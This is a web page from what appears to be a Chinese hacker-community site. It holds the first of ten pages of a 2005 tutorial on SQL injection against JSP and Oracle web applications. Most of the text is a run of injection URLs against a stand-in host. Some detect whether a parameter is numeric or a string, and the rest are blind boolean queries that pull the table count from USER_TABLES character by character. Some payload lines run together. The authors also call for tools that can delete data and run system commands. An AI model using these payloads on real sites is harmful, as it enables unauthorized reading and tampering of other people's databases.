通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 电信网通铁通移动   在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 红客教程 >> 攻防教程 >> 文章正文
推荐:JSP+ORACLE注入方法整理v1.0
责任编辑:admin   更新日期:2005-10-13
 

大家好 ,我们是pt007和solaris7,QQ:7491805/564935,欢迎高手前来交流:)。
首先感谢华仔和他的朋友Hotkey为大家开发的cnsafersi 注入工具,没有这个工具就没有本文,HEHE,本文是对cnsafersi
注入工具抓包后所获得的数据进行了分析和整理,文章写的比较仓促,有不足之处欢迎同行指正。
另外希望有高手开发出功能更加强大的JSP注入程序,cnsafersi目前仅有select的功能,建议新的JSP注入工具中能加入
insert/delete/update/backup/上传/执行系统命令等功能,可以参考NBSI的功能进行开发。参考文章:《如何开发CnSaferSI》。

    首先介绍本文中所使用的工具之JSP注入利器:华仔和他的朋友Hotkey开发的cnsafersi,关于使用方法近期我会写一个详细的使用教程:

 


下面以上图中的AD表为例来说明JSP+ORACLE注入的过程:

1、 判断注入类型(数字型还是字符型)
字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分)
http://www.test.net/index_kaoyan_view.jsp?id=117

And user>char(0)
http://www.test.net/index_kaoyan_view.jsp?id=117

And userhttp://www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '1'='1
http://www.test.net/index_kaoyan_view.jsp?id=117'

And userhttp://www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '%25'='
http://www.test.net/index_kaoyan_view.jsp?id=117'

And userhttp://www.test.net/index_kaoyan_view.jsp?id=117) And user>char(0) And 1 in(1
http://www.test.net/index_kaoyan_view.jsp?id=117)

And userhttp://www.test.net/index_kaoyan_view.jsp?id=117') And user>char(0) And (' ')=(' 
http://www.test.net/index_kaoyan_view.jsp?id=117')

 And userhttp://www.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97)
http://www.test.net/index_kaoyan_view.jsp?id=117 And str(98)

http://www.test.net/index_kaoyan_view.jsp?id=117'

And str(98)>str(97) And '1'='1
http://www.test.net/index_kaoyan_view.jsp?id=117'

And str(98)http://www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '%25'='


http://www.test.net/index_kaoyan_view.jsp?id=117'

And userhttp://www.test.net/index_kaoyan_view.jsp?

id=117' And str(98)
http://www.test.net/index_kaoyan_view.jsp?id=117) And str(98)>str(97) And 1 in(1
http://www.test.net/index_kaoyan_view.jsp?id=117)

And str(98)http://www.test.net/index_kaoyan_view.jsp?

id=117') And str(98)>str(97) And (' ')=('
http://www.test.net/index_kaoyan_view.jsp?id=117') And str(98)

出现正常的页面:
http://www.test.net/index_kaoyan_view.jsp?id=117 And USER>CHR(0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And USER

2、 猜解表数量和表名

数据库数量为3:
http://www.test.net/index_kaoyan_view.jsp?id=117

And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) 

http://www.test.net/index_kaoyan_view.jsp?id=117

 And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And UNISTR(1)>UNISTR(0) 

以下为猜解数据表数量
数据表第一位为:1

http://www.test.net/index_kaoyan_view.jsp?id=117

And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1)) 
http://www.test.net/index_kaoyan_view.jsp?id=117

And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1)) 


数据表第二位为:3
http://www.test.net/index_kaoyan_view.jsp?id=117

 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 
http://www.test.net/index_kaoyan_view.jsp?id=117

 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 109>ascii(substr((SELECT COUNT (*)

 FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

http://www.test.net/index_kaoyan_view.jsp?id=117

 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) 

数据表第三位为:1

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] 下一页

  • 上一篇文章:
  • 下一篇文章:
    • 最近更新
    固顶文章 爱国者安全网2007年度优秀版主评选
    普通文章 瑞星公司01月11日发布 每日计算机病毒及木马播报
    普通文章 破解博彩神助(专注彩票) V2.8.01
    推荐文章 推荐:跨站脚本执行漏洞代码的六点思路
    普通文章 Windows系统下的远程堆栈溢出 实战篇
    普通文章 Windows系统下的远程堆栈溢出 原理篇
    普通文章 MsSQLServer是如何加密口令的
    普通文章 浅谈国内的渗透评估过程
    普通文章 Dvbbs8.1 0DAY(通杀Access和mssql版本)
    普通文章 微软:我们的代码比赛门铁克更安全
    热门文章
    普通文章提醒:“求职信”病毒1月6日发作
    普通文章两条“蠕虫”蠢蠢欲动
    普通文章5“网银大盗”狂盗储户14万 武汉男子被判10年
    普通文章“木马事件”终告结束 英语学习网重获新生
    普通文章搜索引擎不再喜欢新米,并非只是CN米
    普通文章蠕虫"威金"新变种 "小熊猫"屠宰多个计算机系统
    普通文章元旦上网谨防“Real蛀虫” 通过视频文件传播
    普通文章入侵工具Knark的分析及防范
    普通文章认清本质 计算机病毒防治常遇问题
    普通文章饶过现代Anti-Rookit工具的内核模块扫描(ZT)
    精彩专题